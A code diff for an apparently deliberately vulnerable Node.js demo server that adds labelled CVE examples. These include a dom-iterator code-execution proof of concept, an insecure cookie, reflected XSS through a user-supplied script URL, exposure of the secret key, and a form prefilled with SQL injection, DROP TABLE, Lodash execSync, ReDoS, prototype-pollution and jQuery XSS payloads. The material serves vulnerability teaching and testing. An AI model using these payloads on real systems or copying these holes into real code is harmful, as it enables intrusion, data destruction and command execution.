@@ -18,6 +18,33 @@ const server = http.createServer((req, res) => {
1818 const postData = qs . parse ( body ) ;
1919 let responseMessages = [ ] ;
2020
21+ // CVE-2024-21541: dom-iterator
22+ var PUT = require ( 'dom-iterator' ) ;
23+ global . CTF = function ( ) { console . log ( "GLOBAL.CTF HIT" ) } // We want to prove we can execute this by using the package
24+
25+ var parser = require ( 'mini-html-parser' ) ;
26+ var html = '<h1></h1>' ; // Any non-empty html should work
27+ var parser = parser ( html ) ;
28+ var node = parser . parse ( ) ;
29+ var it = PUT ( node ) ;
30+ var next ;
31+ while ( next = it . next ( "constructor.constructor('global.CTF()')()" ) ) { }
32+
33+ // Vulnerability: Missing SameSite Attribute on Cookies
34+ res . setHeader ( 'Set-Cookie' , `sessionToken=insecureToken; Path=/; HttpOnly; SameSite=None` ) ;
35+ res . setHeader ( 'Content-Type' , 'text/html' ) ;
36+
37+ // jQuery Vulnerability: CVE-2015-9251
38+ if ( postData . jqueryUrl ) {
39+ const jqueryCode = `<script src="${ postData . jqueryUrl } ;
40+ responseMessages . push ( `<p>Loading jQuery from user-provided URL:</p><pre>${ jqueryCode } ) ;
41+ res . write ( jqueryCode ) ; // This is vulnerable to XSS if untrusted URLs are provided
42+ }
43+
44+ // Placeholder for secret key (potential exposure risk)
45+ const SECRET_KEY = process . env . SECRET_KEY || 'PLACEHOLDER_SECRET_KEY' ;
46+ responseMessages . push ( `<p>Current Secret Key: ${ SECRET_KEY } ) ;
47+
2148 // Direct SQL Injection via string concatenation
2249 if ( postData . rawSql ) {
2350 try {
@@ -132,7 +159,6 @@ const server = http.createServer((req, res) => {
132159 }
133160
134161 // Send combined response
135- res . writeHead ( 200 , { 'Content-Type' : 'text/html' } ) ;
136162 res . end ( responseMessages . join ( '' ) + `<p><a href="/">Go back</a></p>` ) ;
137163 } ) ;
138164 } else if ( req . method === 'GET' ) {
@@ -195,10 +221,13 @@ const server = http.createServer((req, res) => {
195221 <body>
196222 <h2>Package Vulnerability Demo</h2>
197223 <form action="/" method="POST">
224+ <!-- 1. Direct SQL Injection -->
198225 <div>
199226 <h3>1. Direct SQL Injection</h3>
200227 <label for="rawSql">SQL Query:</label>
201- <input type="text" id="rawSql" name="rawSql" placeholder="Enter SQL query" style="width: 100%;">
228+ <input type="text" id="rawSql" name="rawSql"
229+ value="SELECT name FROM sqlite_master WHERE type='table';"
230+ style="width: 100%;">
202231 <small>Try these payloads:
203232 <ul>
204233 <li><code>SELECT name FROM sqlite_master WHERE type='table';</code> (List all tables)</li>
@@ -207,37 +236,57 @@ const server = http.createServer((req, res) => {
207236 </ul>
208237 </small>
209238 </div>
239+
240+ <!-- 2. Sequelize SQL Injection -->
210241 <div>
211242 <h3>2. Sequelize SQL Injection (CVE-2019-10748)</h3>
212243 <label for="username">Username (for Sequelize Injection):</label>
213- <input type="text" id="username" name="username" placeholder="Enter username">
244+ <input type="text" id="username" name="username"
245+ value='nonexistentuser" OR 1=1 --'>
214246 <small>Try payloads:
215247 <ul>
216248 <li><code>nonexistentuser" OR 1=1 --</code></li>
217249 <li><code>admin"; DROP TABLE Users; --</code></li>
218250 </ul>
219251 </small>
220252 </div>
253+
254+ <!-- 3. Lodash Template Processing -->
221255 <div>
222256 <h3>3. Lodash Template Processing (CVE-2021-23337)</h3>
223257 <label for="template">Template String:</label>
224- <textarea id="template" name="template" rows="4"></textarea>
258+ <textarea id="template" name="template" rows="4">
259+ <%= global.process.mainModule.require('child_process').execSync('ls -la') %>
260+ </textarea>
225261 <small>Try payload: <code><%= global.process.mainModule.require('child_process').execSync('ls -la') %></code></small>
226262 </div>
263+
264+ <!-- 4. Semver ReDoS Vulnerability -->
227265 <div>
228266 <h3>4. Semver ReDoS Vulnerability (CVE-2022-25883)</h3>
229267 <label for="versionRange">Version Range:</label>
230- <input type="text" id="versionRange" name="versionRange" placeholder="Enter version range">
268+ <input type="text" id="versionRange" name="versionRange"
269+ value="^((((((((((((((((((a)?){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2})*$">
231270 <small>Try payload: <code>^((((((((((((((((((a)?){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2}){2})*$</code></small>
232271 </div>
272+
273+ <!-- 5. JSON5 Prototype Pollution -->
233274 <div>
234275 <h3>5. JSON5 Prototype Pollution (CVE-2022-46175)</h3>
235276 <label for="json5data">JSON5 Data:</label>
236- <textarea id="json5data" name="json5data" rows="4">
237- {
238- "__proto__": { "polluted": "Prototype pollution successful!" }
239- }
240- </textarea>
277+ <textarea id="json5data" name="json5data" rows="4">{
278+ "__proto__": { "polluted": "Prototype pollution successful!" }
279+ }</textarea>
280+ <small>Try payload: <code>{ "__proto__": { "polluted": "Prototype pollution successful!" } }</code></small>
281+ </div>
282+
283+ <!-- 6. jQuery XSS Vulnerability -->
284+ <div>
285+ <h3>6. jQuery XSS Vulnerability (CVE-2015-9251)</h3>
286+ <label for="jqueryUrl">jQuery URL:</label>
287+ <input type="text" id="jqueryUrl" name="jqueryUrl"
288+ value="http://sakurity.com/jqueryxss">
289+ <small>Try payload: <code>http://sakurity.com/jqueryxss</code></small>
241290 </div>
242291 <input type="submit" value="Submit">
243292 </form>
0 commit comments